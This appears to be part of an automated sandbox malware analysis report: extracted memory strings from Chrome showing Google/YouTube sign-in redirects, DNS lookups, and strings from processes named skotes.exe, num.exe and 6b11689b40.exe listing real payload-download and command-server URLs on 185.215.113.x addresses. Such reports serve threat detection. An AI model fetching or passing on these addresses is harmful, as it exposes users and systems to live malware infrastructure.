Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-b2q0O9C76rq4zXBdyVoO9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsSigninPassiveLoginHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreportCross-Origin-Resource-Policy: cross-originCross-Origin-Opener-Policy: unsafe-noneServer: ESFContent-Length: 0X-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2358243438.00003FCC024B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 302 Moved TemporarilyContent-Type: text/html; charset=UTF-8X-Frame-Options: DENYCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:51:32 GMTLocation: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0M3WRq_AQD5D7Hg-bSMn-g' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreportCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Content-Length: 797X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2322471343.00003FCC03108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 303 See OtherContent-Type: application/binaryX-Content-Type-Options: nosniffCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:51:30 GMTLocation: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=enX-Frame-Options: SAMEORIGINAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionVary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script'Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."Server: ESFContent-Length: 0X-XSS-Protection: 0Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2347060438.00003FCC034DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Location: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARpgrqeCXuozKuNgg6MX9Rq-hQWwPVQwL_ack-uT_7RprktA3kMD0CQY1YwpoLJKsHwkgx7ee0Fz9g equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2322471343.00003FCC03108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2358243438.00003FCC024B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2358149722.00003FCC034C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2346939266.00003FCC02EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2367595616.00003FCC03784000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Location: https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4511769864.0000020C08FC0000.00000002.00000001.00040000.0000001E.sdmp String found in binary or memory: Qhttps://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4511769864.0000020C08FC0000.00000002.00000001.00040000.0000001E.sdmp String found in binary or memory: ]https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4519274085.00003FCC0236C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2373419811.00003FCC03108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=09&ddm=0eport/fine-allowlist equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2346703166.00003FCC02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARpgrqeCXuozKuNgg6MX9Rq-hQWwPVQwL_ack-uT_7RprktA3kMD0CQY1YwpoLJKsHwkgx7ee0Fz9g equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2346703166.00003FCC02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARpgrqeCXuozKuNgg6MX9Rq-hQWwPVQwL_ack-uT_7RprktA3kMD0CQY1YwpoLJKsHwkgx7ee0Fz9g( equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARpgrqeCXuozKuNgg6MX9Rq-hQWwPVQwL_ack-uT_7RprktA3kMD0CQY1YwpoLJKsHwkgx7ee0Fz9gYouTube equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARpgrqeCXuozKuNgg6MX9Rq-hQWwPVQwL_ack-uT_7RprktA3kMD0CQY1YwpoLJKsHwkgx7ee0Fz9gYouTube/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2346703166.00003FCC02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=enYouTube equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=enYouTube/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4518970989.00003FCC022EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=entAPIKeyParameter} equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4511769864.0000020C08FC0000.00000002.00000001.00040000.0000001E.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%252 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2370812661.00003FCC037B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055% equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2346703166.00003FCC02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2453387722.00003FCC038C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0" equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0YouTube equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4513098457.0000020C0B0F7000.00000002.00000001.00040000.0000002B.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2358149722.00003FCC034C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2346939266.00003FCC02EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2367595616.00003FCC03784000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2FpwdYouTube equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2FpwdYouTube/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2358149722.00003FCC034C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2346939266.00003FCC02EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2367595616.00003FCC03784000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: jbhttps://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2373419811.00003FCC03108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: s://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4518934007.00003FCC022DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: tion_handle_signin=true&app=desktop&hl=en&next=https://www.youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd&feature=redirect_login&hl=en equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4519640603.00003FCC023D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2358149722.00003FCC034C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2346939266.00003FCC02EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2358297327.00003FCC0371C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x-auto-login: realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%25253F%25253Dhttps%2525253A%2525252F%2525252Faccounts.google.com%2525252Fv3%2525252Fsignin%2525252Fchallenge%2525252Fpwd%2526feature%253Dredirect_login equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4511769864.0000020C08FC0000.00000002.00000001.00040000.0000001E.sdmp String found in binary or memory: yhttps://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: google.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: chrome.google.com
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 519sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"Content-Type: application/x-www-form-urlencoded;charset=UTF-8sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"X-Goog-AuthUser: 0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://accounts.google.comX-Client-Data: CI62yQEIpbbJAQipncoBCJuDywEIkqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: skotes.exe, 00000003.00000002.4500898178.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exe
Source: skotes.exe, 00000003.00000002.4500898178.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exe4BI
Source: skotes.exe, 00000003.00000002.4500898178.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/test/ko.ps1
Source: skotes.exe, 00000003.00000002.4500898178.0000000001087000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/test/num.exe
Source: skotes.exe, 00000003.00000002.4500898178.0000000001087000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/test/num.exed
Source: num.exe, 00000004.00000002.2121787066.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, 6b11689b40.exe, 00000005.00000002.2214014711.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: num.exe, 00000004.00000002.2121787066.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/F
Source: 6b11689b40.exe, 00000005.00000002.2214014711.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/SSC:
Source: num.exe, 00000004.00000002.2121787066.0000000000C02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/V
Source: num.exe, 00000004.00000002.2121787066.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AE3000.00000004.00000020.00020000.00000000.sdmp, 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp, 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: num.exe, 00000004.00000002.2121787066.0000000000C02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(
Source: num.exe, 00000004.00000002.2121787066.0000000000C02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
Source: 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT
Source: num.exe, 00000004.00000002.2121787066.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd
Source: 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpmkq
Source: num.exe, 00000004.00000002.2121787066.0000000000C02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu
Source: num.exe, 00000004.00000002.2121787066.0000000000C02000.00000004.00000020.00020000.00000000.sdmp, 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: 6b11689b40.exe, 00000005.00000002.2214014711.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37g
